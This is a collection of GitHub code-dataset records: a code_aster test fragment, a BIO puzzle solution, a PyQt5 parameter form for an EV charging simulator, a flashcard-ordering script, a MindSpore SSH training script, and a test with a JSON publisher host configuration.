DEFI_FONCTION(\n NOM_PARA=\"INST\",\n NOM_RESU=\"DEPL\",\n INTERPOL=\"LOG\",\n PROL_GAUCHE=\"LINEAIRE\",\n VALE=(3.0, 3.0, 4.0, 4.0, 5.0, 5.0),\n)\n# DF1.debugPrint()\n\nDN1 = DEFI_NAPPE(\n NOM_PARA=\"AMOR\",\n NOM_RESU=\"ACCE\",\n VERIF=\"CROISSANT\",\n INTERPOL=\"LOG\",\n PROL_DROITE=\"CONSTANT\",\n PROL_GAUCHE=\"CONSTANT\",\n PARA=(0.01, 0.02),\n FONCTION=(DF1, DF2),\n)\n\nvalues2 = DN1.getValues()\nnbv2 = len(values2[1]) // 2\ntest.assertEqual(values2[1][nbv2:], [3.0, 4.0, 5.0], msg=\"DN1: values\")\n\nparameters = DN1.getParameters()\ntest.assertEqual(parameters, [0.01, 0.02], msg=\"DN1: parameters\")\n\n# DN1.debugPrint()\ntest.printSummary()\n\nFIN()\n","repo_name":"Krande/code-aster-copy","sub_path":"astest/func01a.py","file_name":"func01a.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24948049135","text":"from collections import namedtuple\n\nPoint = namedtuple('Point',['straight','left','right'])\n\nNetwork = {'A':Point('D','E','F'), 'B':Point('C','G','H'), 'C':Point('B','I','J'),\n 'D':Point('A','K','L'), 'E':Point('A','M','N'), 'F':Point('A','N','O'),\n 'G':Point('B','O','P'), 'H':Point('B','P','Q'), 'I':Point('C','Q','R'),\n 'J':Point('C','R','S'), 'K':Point('D','S','T'), 'L':Point('D','T','M'),\n 'M':Point('U','L','E'), 'N':Point('U','E','F'), 'O':Point('V','F','G'),\n 'P':Point('V','G','H'), 'Q':Point('W','H','I'), 'R':Point('W','I','J'),\n 'S':Point('X','J','K'), 'T':Point('X','K','L'),\n 'U':Point('V','M','N'), 'V':Point('U','O','P'),\n 'W':Point('X','Q','R'), 'X':Point('W','S','T')\n }\n\nstates = {node:'left' for node in Network}\n\nflipflops = list(input())\nstart, stop = list(input())\nnumber_of_moves = int(input())\n\ndef get_next_node(before,after):\n if Network[after].straight == before: # if we've come from a straight direction\n direction = states[after] # we will leave depending on the state of the current node\n if after in flipflops: # if we're a flip flop node then we must change the state \n states[after] = next(d for d in ('left','right') if d != states[after])\n return Network[after].__getattribute__(direction)\n elif Network[after].left == before: # if we've come from a left direction\n if after not in flipflops: # set the state if it's a lazy node \n states[after] = 'left'\n return Network[after].straight\n elif Network[after].right == before: # if we've come from a right direction\n if after not in flipflops: # set the state if it's a lazy node \n states[after] = 'right' \n return Network[after].straight\n\n\nfor _ in range(number_of_moves):\n start, stop = stop, get_next_node(start,stop)\n\nprint(start + stop)\n","repo_name":"s-cork/BIO","sub_path":"2012/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9130701281","text":"import copy\n\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QSpinBox, QDoubleSpinBox, QLineEdit, QCheckBox\nfrom PyQt5.QtGui import QKeySequence\n\nfrom PyQt5.QtWidgets import *\nfrom src.app.animation import Animation, VisualizationWindow\nfrom src.models.cities import SquareCity\nfrom src.app.visual_analysis import DistributionVisualization\nfrom src.app.params import LY_ENG_TO_SP, LY_SP_TO_ENG\n\n\n\n\nclass PageParam():\n def __init__(self, widget, minimum, single_step, key, label ):\n self.widget = widget\n self.minimum = minimum\n self.single_step = single_step\n self.key = key\n self.label = label\n\n\nclass ParamsCreationForm(QWidget):\n def __init__(self, app_params, callback, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n\n self.app_params = app_params\n self.internal_params = copy.deepcopy(app_params)\n self.callback = callback\n\n # Create the layout of the class\n self.layout = QVBoxLayout()\n\n # Create the stack that will hold the different pages \n self.stack = QStackedWidget()\n # Add the different pages to the stack\n self.widgets = [CityCreationPage(),PhysicalUnitsPage(), DistributionPage(), GeneralPage(), InstancesPage() ]\n for w in self.widgets:\n self.stack.addWidget(w)\n # Create the button row at the bottom\n self.button_layout = QHBoxLayout()\n self.next_page = QPushButton(\"Siguiente\")\n self.next_page.clicked.connect(self.on_click_next_page)\n self.previous_page = QPushButton(\"Anterior\")\n self.previous_page.clicked.connect(self.on_click_previous_page)\n self.cancel = QPushButton(\"Cancelar\")\n self.cancel.clicked.connect(self.on_click_cancel)\n self.save = QPushButton(\"Establecer parámeteros\")\n self.save.clicked.connect(self.on_click_save)\n\n button_row = [self.cancel, self.previous_page, self.next_page, self.save]\n for button in button_row:\n self.button_layout.addWidget(button)\n self.button_tool = QWidget()\n self.button_tool.setLayout(self.button_layout)\n\n # Perform the initial step\n self.update_page_info()\n self.update_button_tool()\n \n # Configure the general layout with the stack and the button tool row.\n self.layout.addWidget(self.stack)\n self.layout.addWidget(self.button_tool)\n self.setLayout(self.layout)\n \n def update_app_params(self, app_params):\n \"\"\"The internal app_params attribute points to the new ones and also the internal \n parameters are updated, there is a current page update afterwards. \"\"\"\n self.app_params = app_params\n self.internal_params = copy.deepcopy(app_params)\n self.stack.setCurrentIndex(0)\n self.update_page_info()\n self.update_button_tool()\n self.show()\n\n def update_internal_params(self):\n \"\"\"For each widget in the current page widgets_dict, updates the corresponding internal value. \"\"\"\n # Point to the current page\n page = self.stack.currentWidget()\n # For each widget inside the page, update the corresponding internal param.\n for k, w in page.widgets_dict.items():\n if isinstance(w, QSpinBox) or isinstance(w, QDoubleSpinBox):\n self.internal_params[k] = w.value()\n elif isinstance(w, QLineEdit):\n if k in [\"EV_DENSITY_VALUES\", \"TF_DENSITY_VALUES\"]:\n self.internal_params[k] = [float(p) for p in w.text().split(\" \") if p != \"\"]\n else:\n self.internal_params[k] = w.text()\n elif isinstance(w, QCheckBox):\n self.internal_params[k] = w.isChecked()\n\n def update_button_tool(self):\n # Check the different cases based on the new page.\n current = self.stack.currentIndex()\n if current == 0:\n self.previous_page.hide()\n self.save.hide()\n self.next_page.show()\n \n elif current == self.stack.count() - 1:\n self.next_page.hide()\n self.save.show()\n self.previous_page.show()\n else:\n self.next_page.show()\n self.previous_page.show()\n self.save.hide()\n\n def update_page_info(self):\n page = self.stack.currentWidget()\n page.update_values(self.internal_params)\n\n def on_click_next_page(self):\n # First update the internal values\n self.update_internal_params()\n # Then, move the stack pointer to the next page.\n self.stack.setCurrentIndex(self.stack.currentIndex()+1)\n # Update the values of the page\n self.update_page_info()\n # Then update the button row to show the proper buttons\n self.update_button_tool()\n \n def on_click_previous_page(self):\n # First update the internal values\n self.update_internal_params()\n # Then, move the stack pointer to the previous page.\n self.stack.setCurrentIndex(self.stack.currentIndex()-1)\n # Update the values of the page\n self.update_page_info()\n # Then update the button row to show the proper buttons\n self.update_button_tool()\n \n def on_click_cancel(self):\n self.stack.setCurrentIndex(0)\n for w in self.widgets:\n w.close_external_window()\n self.hide()\n self.callback()\n\n def on_click_save(self):\n # First, save the parameters from the last page\n self.update_internal_params()\n # Then, override each app_param with the internal one\n for key, value in self.internal_params.items():\n self.app_params[key] = value\n self.on_click_cancel()\n def closeEvent(self, cls):\n for w in self.widgets:\n w.close()\n return super().closeEvent(cls)\nclass Page(QWidget):\n \"\"\"Class that controls the logic of a Page through certain functions. Aspects related to the\n desing of the page are left for classes that inherint this one. \"\"\"\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n self.widgets_dict = {}\n\n def add_page_param_to_layout(self, page_params, layout):\n \"\"\"For each PageParam in page_params list, creates the corresponding\n widget object and stores it in a dictionary referenced by its key. \"\"\"\n\n widgets = []\n for param in page_params:\n widget = param.widget()\n if type(widget) == QSpinBox or type(widget) == QDoubleSpinBox:\n widget.setMinimum(param.minimum)\n widget.setMaximum(100000000)\n widget.setSingleStep(param.single_step)\n \n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n elif type(widget) == QLineEdit:\n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n elif type(widget) == QCheckBox: \n self.widgets_dict[param.key] = widget\n layout.addRow(QLabel(param.label), widget)\n widgets.append(widget)\n\n return widgets\n\n def update_values(self, new_values):\n \"\"\"Given a dictionary (WIDGET_KEY:VALUE), updates the widgets inside the\n widgets_dict with the proper values. \"\"\"\n\n for key, widget in self.widgets_dict.items():\n if type(widget) == QSpinBox or type(widget) == QDoubleSpinBox:\n widget.setValue(new_values[key])\n elif type(widget) == QLineEdit:\n if key == \"EV_DENSITY_VALUES\" or key == \"TF_DENSITY_VALUES\":\n widget.setText(\"\".join([str(f)+\" \" for f in new_values[key]]))\n else:\n widget.setText(new_values[key])\n elif type(widget) == QCheckBox:\n widget.setChecked(new_values[key])\n else:\n raise TypeError(\"The widget inside widgets_dict has an unkwon type\")\n def close_external_window(self):\n pass\nclass CityCreationPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the city visualization window\n self.city_visualization = VisualizationWindow()\n \n # City related parameters\n roundabout = PageParam(QSpinBox, 6, 2, \"RB_LENGTH\", \"Tamaño del lado de las rotondas:\")\n av_segment = PageParam(QSpinBox, 20, 8, \"AV_LENGTH\", \"Longitud de una avenida\")\n scale = PageParam(QSpinBox, 1, 1, \"SCALE\", \"Factor de escala del patrón base:\")\n\n # Stations related parameters\n plugs_per_station = PageParam(QSpinBox, 1, 1, \"MIN_PLUGS_PER_STATION\", \"Número mínimo de enchufes por estacion:\")\n d_stations = PageParam(QSpinBox, 1,1,\"MIN_D_STATIONS\", \"Número mínimo de estaciones pequeñas: \")\n\n # Create self layout\n layout = QVBoxLayout()\n \n # Add city configuration subpart\n cities_form = QGroupBox(\"Creación de la ciudad\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"Configuración de la ciudad sintética con rotondas, calles y avenidas.\"))\n self.add_page_param_to_layout([roundabout, av_segment,scale], aux_layout)\n show_city_button = QPushButton(\"Mostrar ciudad\")\n show_city_button.clicked.connect(self.show_city)\n aux_layout.addRow(show_city_button)\n\n\n cities_form.setLayout(aux_layout)\n # Add the cities_form to the layout and create a new part of the form.\n layout.addWidget(cities_form)\n\n # Add stations configuration subpart\n stations_form = QGroupBox(\"Configuración de la distribución de las estaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"El número de estaciones pequeñas total será el siguiente número múltiplo de cuatro y\\n cuadrado perfecto del número mínimo indicado \"))\n self.add_page_param_to_layout([plugs_per_station,d_stations ], aux_layout)\n \n show_st_layout_button = QPushButton(\"Mostrar estaciones\")\n show_st_layout_button.clicked.connect(self.show_stations)\n self.choose_st_layout = QComboBox()\n self.choose_st_layout.addItems(LY_SP_TO_ENG.keys())\n aux_line_layout = QHBoxLayout()\n aux_line_layout.addWidget(show_st_layout_button)\n aux_line_layout.addWidget(self.choose_st_layout)\n \n aux_layout.addRow(aux_line_layout)\n stations_form.setLayout(aux_layout)\n\n # Add the stations_form to the layout\n layout.addWidget(stations_form)\n # Add a save image button to the layout\n save_button = QPushButton(\"Guardar imagen\")\n save_button.clicked.connect(self.save_new_image)\n layout.addWidget(save_button)\n\n # Set the layout\n self.setLayout(layout)\n def show_city(self):\n \"\"\"Reads the values of the QSpingBox parameters and creates and new city. Then it opens\n the visualization window and renders a new visualization of the newly created city. \"\"\"\n\n # Create the city\n rb_length = self.widgets_dict[\"RB_LENGTH\"].value()\n av_length = self.widgets_dict[\"AV_LENGTH\"].value()\n scale = self.widgets_dict[\"SCALE\"].value()\n city = SquareCity(RB_LENGTH=rb_length, AV_LENGTH=av_length, SCALE=scale)\n\n # Display the new city\n self.city_visualization.show()\n self.city_visualization.show_new_city(city.SIZE, city.city_matrix, city.city_map)\n \n\n def show_stations(self):\n # Create the city\n rb_length = self.widgets_dict[\"RB_LENGTH\"].value()\n av_length = self.widgets_dict[\"AV_LENGTH\"].value()\n scale = self.widgets_dict[\"SCALE\"].value()\n city = SquareCity(RB_LENGTH=rb_length, AV_LENGTH=av_length, SCALE=scale)\n self.city_visualization.show()\n # Place the stations in the city based on the parameters chosen.\n min_plugs_per_station = self.widgets_dict[\"MIN_PLUGS_PER_STATION\"].value()\n min_num_stations = self.widgets_dict[\"MIN_D_STATIONS\"].value()\n \n _, TOTAL_D_ST = city.set_max_chargers_stations(min_plugs_per_station, min_num_stations)\n stations_pos, stations_influence = city.place_stations_new(LY_SP_TO_ENG[self.choose_st_layout.currentText()], TOTAL_D_ST)\n \n # Display the newly created city with the stations.\n self.city_visualization.show_new_city(city.SIZE, city.city_matrix, stations_pos=stations_pos, stations_influence=stations_influence) \n\n def save_new_image(self):\n self.city_visualization.update()\n image = self.city_visualization.save_image()\n if image != None:\n path = QFileDialog.getSaveFileName(self, \"Guardar imagen como\")[0]\n if path and image:\n image.save(path+\".png\", \"png\", quality=95)\n def close_external_window(self):\n self.city_visualization.close()\n \n def closeEvent(self, cls):\n self.city_visualization.close()\n return super().closeEvent(cls)\nclass PhysicalUnitsPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the Params\n # Speed parameters\n speed = PageParam(QSpinBox, 1, 1, \"SPEED\", \"Velocidad media en las calles (km/h):\")\n cell_length = PageParam(QSpinBox, 1, 1, \"CELL_LENGTH\", \"Longitud de una celda (m):\")\n simulation_speed = PageParam(QSpinBox, 1, 1, \"SIMULATION_SPEED\", \"Velocidad de la simulación (cell/timestep):\")\n\n # Battery parameters\n battery_capacity = PageParam(QSpinBox, 1, 1, \"BATTERY\", \"Capacidad de la batería (kWh):\")\n station_power = PageParam(QSpinBox, 1, 1, \"CS_POWER\", \"Potencia de las estaciones (kW):\")\n\n\n # Set the layout of the (self) widget\n layout = QVBoxLayout()\n layout.setSizeConstraint(QLayout.SetMinimumSize)\n\n # Subsection about velocity related parameters\n form_speed = QGroupBox(\"Unidades físicas - Velocidad\")\n layout_aux = QFormLayout()\n layout_aux.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([speed, cell_length,simulation_speed], layout_aux)\n form_speed.setLayout(layout_aux)\n\n # Add the first subform to the general layout\n layout.addWidget(form_speed)\n\n # Subsection about energy related parameters\n form_battery = QGroupBox(\"Unidades físicas - energía\")\n layout_aux = QFormLayout()\n layout_aux.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([battery_capacity, station_power], layout_aux)\n form_battery.setLayout(layout_aux)\n\n # Add the second subform to the layout combined and set the general layout.\n layout.addWidget(form_battery)\n\n self.setLayout(layout)\n\nclass DistributionPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n # Create the visualization window\n self.distribution_visualization = DistributionVisualization()\n # Create the PageParam\n battery_autonomy = PageParam(QSpinBox, 1, 1, \"AUTONOMY\", \"Autonomía de una carga completa (km):\")\n battery_thresh = PageParam(QDoubleSpinBox, 0.05, 0.01, \"BATTERY_THRESHOLD\", \"Umbral mínimo de batería (tanto por uno):\")\n battery_std = PageParam(QDoubleSpinBox, 0.05, 0.01, \"BATTERY_STD\", \"Desviación estándar de la batería (tanto por uno):\")\n \n idle_upper = PageParam(QSpinBox, 1, 1, \"IDLE_UPPER\", \"Máximo tiempo en espera (min):\")\n idle_lower = PageParam(QSpinBox, 1, 1, \"IDLE_LOWER\", \"Mínimo tiempo en espera (min):\")\n idle_std = PageParam(QDoubleSpinBox, 0.05, 0.01, \"IDLE_STD\", \"Desviación estándar del tiempo en espera (tanto por uno):\")\n\n layout = QVBoxLayout()\n\n # Create first section defined by a GroupBox\n battery_form = QGroupBox(\"Distribución de la autonomía de batería\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n widgets = self.add_page_param_to_layout([battery_autonomy,battery_thresh, battery_std], aux_layout)\n for w in widgets:\n w.valueChanged.connect(self.update_battery_distribution)\n battery_form.setLayout(aux_layout)\n\n # Add the section to the general layout and then create another section\n layout.addWidget(battery_form)\n\n # Create the second section defined by another Groupbox.\n wait_form = QGroupBox(\"Distribución del tiempo de espera\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n\n widgets = self.add_page_param_to_layout([idle_upper, idle_lower, idle_std], aux_layout)\n for w in widgets:\n w.valueChanged.connect(self.update_wait_distribution)\n wait_form.setLayout(aux_layout)\n\n # Add the section to the general layout and set the class layout.\n layout.addWidget(wait_form) \n self.setLayout(layout)\n\n def update_battery_distribution(self):\n \"\"\"Creates a new normal distribution sample and opens a window with the corresponding\n normal distribution. Uses the values for a battery distribution.\"\"\"\n\n mean = self.widgets_dict[\"AUTONOMY\"].value() // 2\n std = float(self.widgets_dict[\"BATTERY_STD\"].value()) * mean\n low = float(self.widgets_dict[\"BATTERY_THRESHOLD\"].value()) * self.widgets_dict[\"AUTONOMY\"].value()\n \n upper= self.widgets_dict[\"AUTONOMY\"].value()\n\n if upper > low:\n self.distribution_visualization.update_canvas(mean, std, low, upper, \"Autonomía (km)\" )\n self.distribution_visualization.show() \n\n def update_wait_distribution(self):\n \"\"\"Creates a new normal distribution sample and opens a window with the corresponding\n normal distribution. Uses the values of the wait time distribution. \"\"\"\n low = int(self.widgets_dict['IDLE_LOWER'].value())\n upper = int(self.widgets_dict['IDLE_UPPER'].value())\n mean = (low + upper) /2\n std = float(self.widgets_dict['IDLE_STD'].value())* mean\n\n if upper > low:\n self.distribution_visualization.update_canvas(mean, std, low, upper, \"Tiempo en espera (min)\")\n self.distribution_visualization.show()\n def close_external_window(self):\n self.distribution_visualization.close()\n def closeEvent(self, cls):\n self.distribution_visualization.close()\n return super().closeEvent(cls)\nclass GeneralPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n\n # Create the PageParam for this class\n repetitions =PageParam(QSpinBox, 1, 1, \"REPETITIONS\", \"Número de repeticiones de cada simulación:\")\n total_time = PageParam(QSpinBox, 1, 1, \"TOTAL_TIME\", \"Tiempo total de simulación (h):\")\n measure_period = PageParam(QSpinBox,0, 1, \"MEASURE_PERIOD\", \"Tiempo entre cada medición del sistema (min):\")\n directory_path = PageParam(QLineEdit, None, None, \"PATH\", \"Directorio seleccionado:\")\n # Create the layout for this class\n layout = QVBoxLayout()\n\n # First section, general configuration\n configuration_form = QGroupBox(\"Configuración general de las simulaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n self.add_page_param_to_layout([repetitions,total_time,measure_period ], aux_layout)\n configuration_form.setLayout(aux_layout)\n\n # Add the section to the general layout\n layout.addWidget(configuration_form)\n\n # Second section, PATH input.\n path_form = QGroupBox(\"Configuarción de los resultados\")\n aux_layout = QFormLayout()\n msg = \"\"\"Seleccione el directorio donde se van a guardar los resultados de las simulaciones.\\nPuede seleccionar uno del sistema haciendo click en el botón o bien escribir manualmente el directorio.\"\"\"\n aux_layout.addRow(QLabel(msg))\n self.add_page_param_to_layout([directory_path], aux_layout)\n change_path_button = QPushButton(\"Seleccionar directorio del sistema\")\n change_path_button.clicked.connect(self.on_click_change_path_button)\n aux_layout.addRow(change_path_button)\n path_form.setLayout(aux_layout)\n\n # Add the section to the general layout\n layout.addWidget(path_form)\n\n self.setLayout(layout)\n def on_click_change_path_button(self):\n path = QFileDialog.getExistingDirectory(caption=\"Seleccionar directorio de resultados\")\n if path:\n self.widgets_dict['PATH'].setText(path)\n\n\nclass InstancesPage(Page):\n def __init__(self, parent=None, flags=QtCore.Qt.WindowFlags()):\n super().__init__(parent=parent, flags=flags)\n \n # Create the PageParam for this class\n ev_density = PageParam(QLineEdit, None, None, \"EV_DENSITY_VALUES\", \"Valores de densidad de VE:\")\n tf_density = PageParam(QLineEdit, None, None, \"TF_DENSITY_VALUES\", \"Valores de densidad de tráfico:\")\n\n st_central = PageParam(QCheckBox, None, None, \"ST_CENTRAL\", \"Una estación centrada en una avenida\")\n st_distributed = PageParam(QCheckBox, None, None, \"ST_DISTRIBUTED\", \"Pequeñas estaciones en las calles\")\n st_four = PageParam(QCheckBox, None, None, \"ST_FOUR\", \"Cuatro estaciones medianas en las avenidas\")\n\n # Create the class layout\n layout = QVBoxLayout()\n\n # Create the first section about the traffic\n vehicles_form = QGroupBox(\"Configuración de instancias - Vehículos\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel('Introduzca los valores de densidad de VE y densidad de tráfico.\\nPara separar cada valor utilizar un espacio en blanco. \\n Por ejemplo: 0.1 0.2 0.3 0.4 '))\n self.add_page_param_to_layout([tf_density, ev_density], aux_layout)\n vehicles_form.setLayout(aux_layout)\n\n layout.addWidget(vehicles_form)\n\n # Create the second section about the stations\n stations_form = QGroupBox(\"Configuración de instancias - Estaciones\")\n aux_layout = QFormLayout()\n aux_layout.setSizeConstraint(QLayout.SetMinimumSize)\n aux_layout.addRow(QLabel(\"Marque todas las disposiciones de estaciones que desee probar. Al menos una\"))\n self.add_page_param_to_layout([st_central, st_distributed,st_four], aux_layout)\n stations_form.setLayout(aux_layout)\n\n layout.addWidget(stations_form)\n\n self.setLayout(layout)\n","repo_name":"amarogs/simtravel","sub_path":"src/app/parameters_form.py","file_name":"parameters_form.py","file_ext":"py","file_size_in_byte":23097,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"18880428552","text":"# list=['p','q']\n# # ['p1','q1','p2','q2','p3','q3','p4','q4','p5,'q5]\n# n=5\n# b=[]\n# i=1\n# while i= most_changes:\n deck.append(card)\n tmp_unused = unused.copy()\n tmp_unused.remove(card)\n find_most_changes(tmp_unused, deck, tmp_deck_max_cost, max_pair_cost)\n del deck[-1] # remove last one\n elif deck_max_cost > most_changes:\n most_changes = deck_max_cost\n print('%d: %s' % (deck_max_cost, deck))\n\ncards = [ 'ROD', 'RAM', 'MOM', 'ELM', 'ALBUM', 'BULB', 'SUB', 'NUN', 'BUN', 'BUS', 'BIN', 'BIB', 'BED', 'SLED', 'LID', 'LAD', 'DAD', 'MAN', 'FAN', 'FLAN' ]\n\nbar = Bar('Finding least changes (%d min)' % (len(cards) - 1), max=factorial(len(cards)))\nfind_least_changes(cards, good_enough=len(cards))\nbar.finish()\nprint()\nprint('-----------------')\nprint()\nprint('Finding most changes')\nfind_most_changes(cards)","repo_name":"AlexEdgcomb/baby_education","sub_path":"flashcard_chooser/logical_card_ordering.py","file_name":"logical_card_ordering.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36670106023","text":"import os\nimport cv2\nimport time\nimport numpy as np\n\nfrom mindspore.nn import SGD\nfrom mindspore import context, TimeMonitor, Model, load_checkpoint, load_param_into_net\nimport mindspore.common.dtype as mstype\nfrom mindspore.train.callback import CheckpointConfig, ModelCheckpoint\n\nfrom src.config import config\nfrom src.ssh_model import SSHModel\nfrom src.network_define import LossNet, WithLossCell, TrainOneStepCell, LossCallBack\nfrom src.dataset import data_to_mindrecord_byte_image, create_wider_dataset\n\n\nrank = 0\ndevice_num = 1\ncontext.set_context(mode=context.PYNATIVE_MODE, device_target=config.device_target, device_id=0)\n\ndef prepare_wider_dataset():\n \"\"\" prepare wider dataset \"\"\"\n print(\"Start create dataset!\")\n\n prefix = \"wider.mindrecord\"\n mindrecord_dir = config.mindrecord_dir\n mindrecord_file = os.path.join(mindrecord_dir, prefix + \"0\")\n print(\"CHECKING MINDRECORD FILES ...\")\n\n if rank == 0 and not os.path.exists(mindrecord_file + \".db\"):\n if not os.path.isdir(mindrecord_dir):\n os.makedirs(mindrecord_dir)\n\n if os.path.isdir(config.image_dir) and os.path.exists(config.anno_path):\n if not os.path.exists(config.image_dir):\n print(\"Please make sure config:image_dir is valid.\")\n raise ValueError(config.image_dir)\n print(\"Create Mindrecord. It may take some time.\")\n data_to_mindrecord_byte_image(config, prefix)\n print(\"Create Mindrecord Done, at {}\".format(mindrecord_dir))\n else:\n print(\"image_dir or anno_path not exits.\")\n\n while not os.path.exists(mindrecord_file + \".db\"):\n time.sleep(5)\n\n print(\"CHECKING MINDRECORD FILES DONE!\")\n\n dataset = create_wider_dataset(config, mindrecord_file, batch_size=config.batch_size,\n device_num=device_num, rank_id=rank,\n num_parallel_workers=config.num_parallel_workers,\n python_multiprocessing=config.python_multiprocessing)\n\n dataset_size = dataset.get_dataset_size()\n print(\"Create dataset done!\")\n\n return dataset_size, dataset\n\n\ndef train_ssh():\n dataset_size, dataset = prepare_wider_dataset()\n\n net = SSHModel(config)\n net = net.set_train()\n\n param_dict = load_checkpoint('./ssh.ckpt')\n keys = [key for key in param_dict]\n for k in keys:\n if k.find('reg') != -1 or k.find('cls') != -1:\n param_dict.pop(k)\n load_param_into_net(net, param_dict)\n\n device_type = \"Ascend\" if context.get_context(\"device_target\") == \"Ascend\" else \"Others\"\n if device_type == \"Ascend\":\n net.to_float(mstype.float16)\n\n loss = LossNet()\n opt = SGD(params=net.trainable_params(), learning_rate=config.lr, momentum=config.momentum,\n weight_decay=config.weight_decay, loss_scale=config.loss_scale)\n net_with_loss = WithLossCell(net, loss)\n net = TrainOneStepCell(net_with_loss, opt, sens=config.loss_scale)\n\n time_cb = TimeMonitor(data_size=dataset_size)\n loss_cb = LossCallBack(per_print_times=dataset_size, rank_id=rank)\n ckptconfig = CheckpointConfig(save_checkpoint_steps=dataset_size,\n keep_checkpoint_max=4)\n save_checkpoint_path = os.path.join(config.save_checkpoint_path, \"ckpt_\" + str(rank) + \"/\")\n ckpoint_cb = ModelCheckpoint(prefix='ssh', directory=save_checkpoint_path, config=ckptconfig)\n cb = [time_cb, loss_cb, ckpoint_cb]\n\n model = Model(net)\n model.train(config.epoch_size, dataset, callbacks=cb)\n\n\ntrain_ssh()\n","repo_name":"Tangzl7/SSH-MindSpore","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27459799070","text":"'''\nGiven two integers numbers N and K, the Geek wants you to find f(f(..........f(N))) K times, where f(x) = x XOR (x%10).\nNote: XOR represents bitwise xor operation\n\nInput:\n1. The first line of the input contains a single integer T denoting the number of test cases. The description of T test cases follows.\n2. The first line of each test case contains two integers N and K.\n\nOutput: For each test case, print the answer\n\nConstraints:\n1. 1 <= T <= 10\n2. 1 <= N <= 105\n3. 1 <= K <= 109\n\nExample:\n\nInput:\n2\n17 1\n66 3\n\nOutput:\n22\n74\n'''\n\nt = int(input())\n\nwhile t:\n n, k = input().split(' ')\n n, k = int(n), int(k)\n \n res = n\n \n for i in range(k):\n if not res % 10:\n break\n res ^= res % 10\n \n print(res)\n \n t -= 1\n","repo_name":"nirmalnishant645/Python-Programming","sub_path":"Geeks-For-Geeks/Geek-and-Function-V.py","file_name":"Geek-and-Function-V.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"444255319","text":"# -*- coding: utf-8 -*-\nfrom cStringIO import StringIO\nimport collections\nimport json\n\nimport py\nimport pytest\nimport mock\nfrom yatest.common import source_path\n\nfrom market.idx.pylibrary.mindexer_core.publishers.publisher import reconfigure_zk\nfrom market.idx.pylibrary.mindexer_core.publishers.async_publisher import write_publisher_config_to_zk\nfrom market.idx.marketindexer.marketindexer import miconfig\nfrom market.idx.marketindexer.miconfig import TwoPhaseReloadMetaSection\nfrom async_publishing.group_config import TwoPhaseReloadMetaConfig\n\n\nREDUCTOR_CONFIG = StringIO('''{\n \"reload_timeout\": 600,\n \"dcgroups\": {\n \"prod_report_int_vla@vla\": {\n \"async_publishing_mode\": \"disabled\",\n \"simultaneous_restart\": 3,\n \"failures_threshold\": 4,\n \"hosts\": {\n \"host1\": {\n \"key\": \"key:host1.net\",\n \"name\": \"host1.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-1\": {}\n },\n \"service\": \"marketsearch3\"\n },\n \"host2\": {\n \"key\": \"key:host2.net\",\n \"name\": \"host2.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-2\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17051\n }\n }\n },\n \"prod_report_api_iva@iva\": {\n \"async_publishing_mode\": \"enabled\",\n \"generations_prefix\": \"api_generations\",\n \"min_alive\": {\n \"sas\": 0,\n \"iva\": 1\n },\n \"hosts\": {\n \"host3\": {\n \"key\": \"key:host3.net\",\n \"name\": \"host3.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-stats\": {},\n \"search-part-3\": {}\n },\n \"service\": \"marketsearch3\",\n \"port\": 17052,\n \"datacenter\": \"iva\"\n },\n \"snippet.host3\": {\n \"key\": \"key:host3.net\",\n \"name\": \"host3.net\",\n \"cluster\": 0,\n \"dists\": {\n \"search-snippet-part-3\": {}\n },\n \"service\": \"marketsearchsnippet\",\n \"port\": 17052,\n \"datacenter\": \"iva\"\n },\n \"host4\": {\n \"key\": \"key:host4.net\",\n \"name\": \"host4.net\",\n \"cluster\": 1,\n \"service\": \"something_strange\",\n \"datacenter\": \"sas\"\n }\n }\n },\n \"prod_report_main_sas@sas\": {\n 